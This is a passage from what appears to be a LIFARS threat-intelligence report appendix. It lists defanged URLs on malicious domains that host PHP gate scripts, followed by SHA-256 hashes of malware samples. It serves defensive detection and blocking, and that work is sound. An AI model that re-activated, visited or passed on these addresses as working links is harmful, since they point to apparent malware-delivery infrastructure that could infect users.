hxxp://hkf98ua36ou.com/xap_102b-AZ1/704e.php?l=adnaz19.gas hxxp://hkf98ua36ou.com/xap_102b-AZ1/704e.php?l=adnaz4.gas hxxp://hkf98ua36ou.com/xap_102b-AZ1/704e.php?l=adnaz5.ga hxxp://hkf98ua36ou.com/xap_102b-az1/704e.php?l=adnaz5.gas hxxp://hkf98ua36ou.com/xap_102b-az1/704e.php?l=adnaz8.gas hxxp://hkf98ua36ou.com/xap_102b-AZ1/704e.php?l=adnaz8.gas hxxp://nuavclq20tony.com/ hxxp://nuavclq20tony.com/xn102sp10zk hxxp://nuavclq20tony.com/xn102sp10zk/m10ps1-slx.php?l=ledid12.jam hxxp://nuavclq20tony.com/xn102sp10zk/m10ps1-slx.php?l=ledid13.jam hxxp://nuavclq20tony.com/xn102sp10zk/m10ps1-slx.php?l=ledid4.jam hxxp://nuavclq20tony.com/xn102sp10zk/m10ps1-slx.php?l=ledid5.jam hxxp://nuavclq20tony.com/xn102sp10zk/m10ps1-slx.php?l=ledid7.jam hxxp://nuavclq20tony.com/xn102sp10zk/m10ps1-slx.php?l=ledid8.jam 244 Fifth Avenue, Suite 2035, New York, NY 10001 LIFARS.com (212) 222-7061 [email protected] 32 hxxp://nuavclq20tony.com/xn102sp10zk/m10ps1-slx.php?l=ledid9.jam hxxp://pgarfielduozzelda.band/ hxxp://pgarfielduozzelda.band/xn102sp10zk/m10ps1-slx.php hxxp://pgarfielduozzelda.band/xn102sp10zkm10ps1-slx.phpexop12.jam hxxp://pgarfielduozzelda.band/xn102sp10zk/m10ps1-slx.php?l=exop10.jam hxxp://pgarfielduozzelda.band/xn102sp10zk/m10ps1-slx.php?l=exop12.jam hxxp://pgarfielduozzelda.band/xn102sp10zk/m10ps1-slx.php?l=exop13.jam hxxp://pgarfielduozzelda.band/xn102sp10zk/m10ps1-slx.php?l=exop8.jam hxxp://pgarfielduozzelda.band/xn102sp10zk/m10ps1-slx.php?l=exop9.jam hxxp://pgarfielduozzelda.band/xn102sp10zk/m10ps1-slx.php?l=exop9.jam@B8_944473A95__13691 hxxp://rz70tom99.band/ hxxp://rz70tom99.band/xap_102b-az1/704e.php hxxp://rz70tom99.band/xap_102b-AZ1/704e.php hxxp://rz70tom99.band/xap_102b-AZ1/704e.php?1=xorof4.gas hxxp://rz70tom99.band/xap_102b-AZ1/704e.php?l=xorof3.gas hxxp://rz70tom99.band/xap_102b-az1/704e.php?l=xorof4.gas hxxp://rz70tom99.band/xap_102b-AZ1/704e.php?l=xorof4.gas hxxps://g53lois51bruce.company/ hxxps://nuavclq20tony.com/ hxxps://pgarfielduozzelda.band/ hxxps://rz70tom99.band/ hxxps://rz70tom99.band/xap_102b-az1/704e.php?l=xorof4.gas hxxps://rz70tom99.band/xap_102b-AZ1/704e.php?l=xorof4.gas hxxps://xvirginieyylj.city/ hxxps://xvirginieyylj.city/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=batyw11.harz hxxp://veulalmffyy.company/ hxxp://veulalmffyy.company/puewpxmasl/s hxxp://veulalmffyy.company/puewpxmasl/suoepwxpamxapxlamslxdo.php hxxp://veulalmffyy.company/puewpxmasl/suoepwxpamxapxlamslxdo.php? hxxp://veulalmffyy.company/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=sklimf13.harz hxxp://veulalmffyy.company/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=sklimf2.harz hxxp://veulalmffyy.company/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=sklimf4.harz hxxp://veulalmffyy.company/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=sklimf5.harz hxxp://veulalmffyy.company/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=sklimf9.harz hxxp://veulalmffyy.company/puewpxmasl/XXX hxxp://wbfnjohanna.band/xn102sp10zk hxxp://wbfnjohanna.band/xn102sp10zk/m10ps1-slx.php hxxp://wbfnjohanna.band/xn102sp10zk/m10ps1-slx.php?l=tdog2.jam hxxp://wbfnjohanna.band/xn102sp10zk/m10ps1-slx.php?l=tdog2.jam hxxp://wbfnjohanna.band/xn102sp10zk/m10ps1-slx.php?l=tdog3.jam hxxp://wbfnjohanna.band/xn102sp10zk/m10ps1-slx.php?l=tdog4.jam hxxp://wbfnjohanna.band/xn102sp10zk/m10ps1-slx.php?l=tdog5.jam hxxp://wbfnjohanna.band/xn102sp10zk/m10ps1-slx.php?l=tdog6.jam hxxp://wbfnjohanna.band/xn102sp10zk/m10ps1-slx.php?l=tdog7.jam 244 Fifth Avenue, Suite 2035, New York, NY 10001 LIFARS.com (212) 222-7061 [email protected] 33 hxxp://xvirginieyylj.city/ hxxp://xvirginieyylj.city/puewpxmasl/ hxxp://xvirginieyylj.city/puewpxmasl/suoepwxpamxapxlamslxdo.php hxxp://xvirginieyylj.city/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=batyw10.harz hxxp://xvirginieyylj.city/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=batyw11.harz hxxp://xvirginieyylj.city/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=batyw3.harz hxxp://xvirginieyylj.city/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=batyw5.harz hxxp://xvirginieyylj.city/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=batyw9.harz hxxp://zgnoeliakatelynn.com/ hxxp://zgnoeliakatelynn.com/xn102sp10zk/m10ps1-slx.php hxxp://zgnoeliakatelynn.com/xn102sp10zk/m10ps1-slx.php?cubom16.jam hxxp://zgnoeliakatelynn.com/xn102sp10zk/m10ps1-slx.php?lcubom hxxp://zgnoeliakatelynn.com/xn102sp10zk/m10ps1-slx.php?l=cubom10.jam hxxp://zgnoeliakatelynn.com/xn102sp10zk/m10ps1-slx.php?l=cubom[1-16].jam hxxp://zgnoeliakatelynn.com/xn102sp10zk/m10ps1-slx.php?l=cubom11.jam hxxp://zgnoeliakatelynn.com/xn102sp10zk/m10ps1-slx.php?l=cubom16.jam hxxp://zgnoeliakatelynn.com/xn102sp10zk/m10ps1-slx.php?l=cubom9.jam Samples: 0090a5eb10e90e9dc8969e1d4ca370a24a81cacae7813f004c35c96b3d34ef5c 00a87f7662cac33aa1199e1d36b15d71064b093ffcadcf71ec19380d775323e1 01dc719df7ef8513ebdb85f1cd2bc4603b8873c56ce380f9d3607419f571c419 0344ec99e907790b9c1d851e1e07814f046d8b595b8b064d0214c1d5e5183616 0ab17567f4c1bbad33f8021384b8afc96ee02afef0e55dfe59563302d8d6aed0 0db384aa1bd02b3f983b8503879200558a2c44590a90f44087792ce0d00d43e9 12a05273cdf3182b9bf2208cce3180c72c15ebd784af771ab0a158369814b6d9 13f4f6bfa687c3b0a01c16f4c313bd10960d76258c2b97429b77a15b69870d1c 14a813a38243e7803b74495c2be94a34c7d702d11c416e0925c5e33e6720d3dd 1d57bb7ec42a9437e35b2f8a8d7d2bff6dc1615f6db64bbb8af481211561a83e 1dd20cdc8f64e052ffc7ff8aa3edcf0b487a03308b7855f55e62cffe58b89188 1e1509a6a58b807e396162f2ead1f67d361d2b663336a66b2493acd92bea9a2a 21057a60024538576afbc3ab4fa60b0dbaf447f3424f05430d58b0c5b3a11fa9 22286debebb3db5e95c654e0a03634347ec255a2489469c9f73093c3e923235b 26ae9013972716985d16a30b9bb67c763a0b9403855e81ed2dd3a5235188b635 281ebba397af5de8db77bb4b6413f88327c14d06a1f77b6b126c355a64554626 2b7ef4b46a5f23b8a50a3a219eaf6b87440c2882069292ec95e38c034aece31c 2d4690b8d373bb95561af26c44c4b3843d2e14280258bdf09d8b4972461f5b45 312a01c19348d4a48841f1e0c6b77605eeb146e9bdcf2886411a2d18f9985ae8 33672b3d477e75c8c1f9cb222a4fcab2184fec1fd9b98767e061aec7e576ad60 373b866d92ef04e1b5d5e9a9400b1c18e389aa3b6829c4f80bea9812013da78c 37c342b36a8c0b107ce510397a9b335711f0953cbbdbcdb41b88c50ad07c6bce 38262decdac6c7aa72450c399141d7c058f17698e017e3baa0b7b54298439546 3b155ad9f8b983c960de85b1e2cbf26e76b7b0a591520626a49ad8f00a35785b 3bfc794becbcc085e64125b3b7eb46f1fffc80bb93d2231790b57bc9bc97725b 3dd1c0ba9dc20f0d27e63e70563e8bdd8b5133510f09df6d59ccd9943143bdfb 244 Fifth Avenue, Suite 2035, New York, NY 10001 LIFARS.com (212) 222-7061 [email protected] 34 3fa080a3b3bc2333173c8119b940016143a1d20abe80994499017f1e9e70b41a 45763a1bae98f75a15d5e0e8f7a2e0a0fb085d39989eb0193efa13124d98d35f 46c9ad9ac2d0ca987f094d27ba8643ef613f140d2a7e0d7738e603925ad9449d 486b52be2ef32efde11ebcc9dac6413a95b72167a0cfc5c323c114f7179f4b6b 4a3e65a9d0ec3daf38e9c81918c3971b95390599956874398482b13e20c536a1 4d6f73f7a470c95894b345d33e1852c29cf91476d27f3871546f09c8429a2c99 4e931eaad8790f1edddb72f0ea4a9b50ab3c93916f09b5b9659378328b97f3fb 4e9ea2399fe1d593a0a7d233e6f92bcae3ff521f3354cb5127ad8d31c9a26b7d 4eb6478ea45a6c78b641b282a7ff0508050044777c668df8ed959b06ba661abf 4ef7b518d42a8e0fc1f879dc175fbf1c7d0f0c0e1c402d63eef73db4bf27a895 4fc7c0491710340f62993fb62a94848e3c5935c7d9d3f950700bacf8fd56d29d 58da1463d41297ab73ff61354aa54e422e8f1889af499fc75f44ca7e9c6d7d58 5b43d8dbfc3084e19c4d56949a48d72a269aa804dcac0a48bae5e1aad77a5647 5d15ca9342abc08594f76d2ad16aae8058d0ed18038e1dadbcc0551bdad0760f 5efe82556278fcac1d9d662d3e1a0abe060f48b24537e2843c74532ee13150f9 5f5eb22a5cd351c63392156a865eec79361721cc56f7c7dcc9d1be8720308741 6065712d7439ad5478288ae075eb4e3a7b25f769983e0782f73091d9c66adec4 61cc4d1e5b08f5161d7b597b8231ac01e30ab39af2741c79ef0740febcaf2859 63058d4d1631ab9bd4bef4016384ef164e1a7e8fc083c4609d0a1d37f75a53de 6403adc739161960f95473477bbe4eca0812e35bf8b0510c4d221ce95348e4b1 6921ed58c5396697eb8dc3beb2f1c23641b7af30259a83b31d918b062bb649f3 6ac8a2f2c73bd7e77aa6f132a2300e8b04b8c675f23b74f9cd5892f9a14a11d3 6ffb1eeb01acb2760a1b1358fa7d30ab1eb06f45f4ff7b64f48a59fc4a795e93 7202707191fc9f702ca503aeed19332afb15b169d9c37c21767434501942695a 74477d34586f996af7d2c915315ca29edabbbe9fa0f28d6a96f9e7374d307d14 7475ee8bb92dfde99a385fbeb715d9dc3b6340c69cf9045aaee54a6ab26654f2 7650fda380fb569b1be96b605e799de2e5c683c2bff449333a34c10b1a85a613 77af4359a5c056aa2ab20ee2cdc4add00419bcb30371ab1107470a22c308b9bf 78e3f5ba4f4207b547dee306c3a6b9e282af662e74ef804363ebe2665c827465 7dcc1f253a147a68a5abd44f83b71e820d2403aaa13552e08e009ea68967766e 84067c07cb3da2c063b9fa3b0a1b28e71133ab7cf8889745820fd2abcd422028 8495f62347ec3ac79ece995fde2327b08b96b11d50ccf6f7f6fbe189ea9e8ce2 8bdd831fa3c5d725724a2f1fd8ba1d806b1719acfa89d90b10b4121c018937c9 8d2e1ea4eec9578f4d4054bebb2d48ba06460c9b8b472128a8f0239e52ae2975 8f542cacbb8ed0c7f04d486a952504f64768a2c9c8e18645444416cf88a2490f 90d4ce9b2f662e296ec84442c81d7e333f09a8f0ec02877b9b8f8d0ea99bfcc5 92a89e6c942eef866662ccde64a1cfe400c7086c852f99a513ab448fce899911 93b2b31876ffc0391a5d0aa9524a8600009ba8d11b19d805a096365419f02938 95c056737ce3b7de42309b56fe596d857d52d6c7178f5b73f1baa07e0631a95f 962586a1754cc4ae1d3b2272995747eca7b2a2c3115022beb8d08238451849de 9639acbb1a74e968f42f74847df5b39e53b0b529a114f1c25a6cd96a2cd60b5d 9775c86c4e6183e906925d9686a0e4bedd6b3fcfded5ec86f57871919b195240 97e9afa9e21c07e71b802d99c7a41f462f9aad47a8324dd364dc307b20e0565b 9a0091c9222c189dd8dcccbded1e777a67d6fb5add08d960df6fbaf840c4e602 244 Fifth Avenue, Suite 2035, New York, NY 10001 LIFARS.com (212) 222-7061 [email protected] 35 9e5e850d8150fcc67361620e85d0ee66ca5e63785ec9c6452d68eef7300af396 9ed51707c31f4a680222ec2ff45ade5f08e134e0975d1c3b1dadebfb3d90d90a 9fcfda8562185821cf3a6147565e87438f769c663bab23500f77433644c13a20 a0c95628b45f8c6206d0db547791b0ec7c86f9c53578c74af641181130ae42ec a30054ebac6ba39a70031aa8a84c04ba106354b5cb3af12deacc0c26152d25b3 a32f96b630d2d59b3977618d9fbc0516c40aa1868302aa32dbeca91bd4abb884 a3c172e12ebe284d809d31bc193b37061dca3e9566580a4eb4ea3040a0d97b77 a4ec868b4f4a578b97f498896a42f8882f345bd4f4cae3f6b29bbc0319279434 a634a2b1175c6cd20c7a1b5c88d8ec7ebd26df661fcd1f5b83187f06efd47382 a6f493975810828f203d7297c84678b90248a1be767aa13fe5837c57ef6b0a6d a81dbf05c60e71229e038aa267ba66ce1ea3ce890575d3f0eb58c79c2c57085e a8a4640cd5e39c8b96aa01f3ad7f2208fd71f76d4491ecd9cb73dd2e4e2ce27e ab37f3c2b6d280a1c573e54386023696eb03bdeb4dfb4af3051846f4b0cc060c abff796e1bc6d32c36d40c48542688797e72062db50bb3fa5ee870501868af69 b65ddadd1f89643fcf8305c00b9db8ff9b0fbe3215e1670b5eb3d32c14e1fcaf b6a415bd6f3ea1e803afd3cf820f9e7815e8a9b38f865062a3a7e3d56acc9f68 b7d30b145b009083ac8683cfcd59e4d8769cbd305d1f321083bb3be2f17e2857 bfc272cd9aeb9cbb5ce595d1ab889174e1d4407ce3bdc3f0d9a1a7d1230493d6 c1291c0cf1b22ba9829a932b0a112dddc99a18f93a712e4db5fd8ab98082d063 c21ecee9b6ac835b87f5895febdf5e40362419b85122510905ac7c898625dbbc c668b0d251628f1be28b716e8584bf82bbf8ff09384d01c40755e333f0fdf89d cbe29f9b03b7da02e266c6650ed92fe46ba4ab9d1908bf0b6d55f599d58a7f39 cc5059f9db19483b1d4c5bbe3af86290dc5222fa359785a145cb7d742d3411aa cceb073cc5f696eb3b785490b708076b780f6d109d98c0173d1822d514751cf0 cd7f283a0766e0ea5f68c25eb1aeb01cd3b8e469d2ad9c586260398af36ad94d d93f1d423add887b3bf4d26fd3862e54bbc1c6007dae7f4114ef82f143635716 e0665789f79e5db45653d78373dfed3bdc231490f399257c83e06270f8308457 e1e277ddbb659a28150d4af6a6537cc74eb0044e90fdf83f5362bca85249900d e30bf61d0991b041bdb725847f67acba8c32e1ddce0539fa98ad2bf3cc4f79a4 e32601feb6e36035cd3ffc420d489c9ecb5999b65ee20dc07df021f8031646b1 e4a959684cd6ea7248dc4d2ad0d5df2790ff217685c2a341d242a85b5808d720 e92068587d6f3619f71575d4500bdee9af4511c662dc3c44857981e513d419ff e974c3f5b8aacbb599bc81407f6171dc702e3e3baa55fa53647a395c37f3eef1 eb15567067bcec7ce3d2cf34cddb654230d538c6dc03955d75bcb1b6b8fa8f11 f17abd9afb7abb84ebd75cd0ea12c7831a30e1226b48fd4314f9a5b64b29a567 f1d38bb02a5dea271fe7f8db50db348fac3887af26cc7be3054920c68227beaf f39d6a09ed5720e0d125438d3f1ef27b305be6d40974cf9d9131954b302d7203 f6b01cc5ec897a40684d53ad4e044750a5c1848293376e950fc3f35a28dd8bfc f70b95b502c3d55a4c8a8565f462239b2be3e9ecd90fdb4dfbcbf93c900e4156 f8ba5edc4be23a37178ff4b60bc7904e60df1f907996a8b1ac795a58db6214d4 f9e448fc3d9923187c3a4ca7e91c02f15ec4c4d30301ea91f0014b80db88d415 fb682f79427c475cfe2a02621b40faf4a7aefbe1eab900a83ebdfca5802856d0 fbad24ad8e25e4bd3b4e030a085f11caab6f068dc3c85edbb9fa0720c2c30708 fbc964a3439886b66a78c5351a15c68fe6ea41741d2b32c12cc9af23344e0eeb 244 Fifth Avenue, Suite 2035, New York, NY 10001 LIFARS.com (212) 222-7061 [email protected] 36 fcbc470bdaf3fdcb0a40508d04beaff0e99087c151bb21c2889ad4f6cdcc20f3 fe7aa22e1b9b83661bbf120d6e54c68c8498df61aa76576ccd6eaaa7a7fd8ed2 244 Fifth Avenue, Suite 2035, New York, NY 10001 LIFARS.com (212) 222-7061 [email protected]